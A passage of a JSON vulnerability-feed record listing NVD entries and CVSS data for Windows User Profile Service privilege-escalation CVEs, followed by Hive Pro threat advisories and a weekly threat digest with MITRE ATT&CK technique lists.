"cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:rt:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:x86:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*"]}, {"lastseen": "2023-05-27T14:20:27", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21919.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "cve", "title": "CVE-2022-21895", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-05-23T17:29:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-21895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21895", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:rt:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-27T14:34:38", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26904", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26904"], "modified": "2022-04-26T14:08:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-26904", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26904", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:33", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-34484", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}], "hivepro": [{"lastseen": "2022-03-25T14:28:59", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here After seven months, a vulnerability that was addressed in August 2021 patch Tuesday remained unpatched. This locally exploited vulnerability is tracked as CVE-2021-34484 and affects the Windows User Profile Service. While Proof-of-concept is been available for some time now, it is not been actively exploited in the wild. This Elevation of Privilege vulnerability was found by renowned researcher Abdelhamid Naceri and reported to Microsoft, which addressed it in their August 2021 release. Naceri noted that Microsoft's fix was incomplete soon after it was issued and presented a proof of concept (POC) that bypassed it on all Windows versions. That is when the 0patch team, published an unofficial security update for all Windows versions and made it available for free download to all registered users. Microsoft then patched this security flaw in their January 2022 release, tracking it as CVE-2022-21919. Naceri, on the other hand, discovered a way around this second patch. However, Microsoft's second attempt to fix the bug altered the "profext.dll" file, resulting in the removal of the unofficial workaround of 0patch from everyone who had installed the January 2022 Windows updates. Organizations could apply the 0patch unofficial patch to patch this vulnerability using the steps given below: 1. Update Windows 10 to the latest March 2022 patch.2. Create a free account in 0patch Central3. Install and register the 0patch Agent4. An automated micro-patching process will initiate to apply this patch. Potential MITRE ATT&CK TTPs are: TA0042: Resource DevelopmentT1588: Obtain CapabilitiesT1588.006: Obtain Capabilities: VulnerabilitiesTA0001: Initial AccessT1190: Exploit Public-Facing ApplicationTA0004: Privilege EscalationT1068: Exploitation for Privilege EscalationTA0005: Defense Evasion T1548: Abuse Elevation Control Mechanism Vulnerability Details References https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484 https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/ https://blog.0patch.com/2022/03/a-bug-that-doesnt-want-to-die-cve-2021.html", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T13:56:19", "type": "hivepro", "title": "Microsoft\u2019s privilege escalation vulnerability that refuses to go away", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919"], "modified": "2022-03-25T13:56:19", "id": "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "href": "https://www.hivepro.com/microsofts-privilege-escalation-vulnerability-that-refuses-to-go-away/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-22T17:42:03", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Microsoft addressed 128 vulnerabilities in there April patch Tuesday update. Two of them have been categorized as zero-day vulnerabilities. One of the two zero-days is exploited-in-the-wild as well. The vulnerability, CVE-2022-24521, has been exploited in the wild. By exploiting this flaw in the Windows Common Log File System (CLFS) driver, an attacker can escalate privileges. The second zero-day is CVE-2022-26904, which is discovered in the Windows User Profile Service also permits the escalation of privileges. Despite being listed as more likely to be exploited, it has a high attack complexity, and successful exploitation requires an attacker to win a race condition. Organizations have advised the patch all these vulnerabilities as soon as possible to avoid exploitation. Potential MITRE ATT&CK TTPs are: TA0042: Resource Development T1588: Obtain Capabilities T1588.006: Obtain Capabilities: Vulnerabilities TA0001: Initial Access T1190: Exploit Public-Facing Application TA0004: Privilege Escalation T1068: Exploitation for Privilege Escalation Vulnerability Detail Patch Links https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904 References https://www.cisa.gov/uscert/ncas/current-activity/2022/04/12/microsoft-releases-april-2022-security-updates", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T05:08:02", "type": "hivepro", "title": "Microsoft Patch Tuesday April 2022 addressed two zero-day vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521", "CVE-2022-26904"], "modified": "2022-04-14T05:08:02", "id": "HIVEPRO:F62D9BF485959B812585A48122216FD7", "href": "https://www.hivepro.com/microsoft-patch-tuesday-april-2022-addressed-two-zero-day-vulnerabilities/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T15:30:50", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here. Microsoft has fixed 97 vulnerabilities, with nine classified as Critical and 88 as Important and among them 6 zero-days. Following are the type of security vulnerabilities reported in multiple Microsoft products: 41 Elevation of Privilege Vulnerabilities 29 Remote Code Execution Vulnerabilities 9 Security Feature Bypass Vulnerabilities 6 Information Disclosure Vulnerabilities 9 Denial of Service 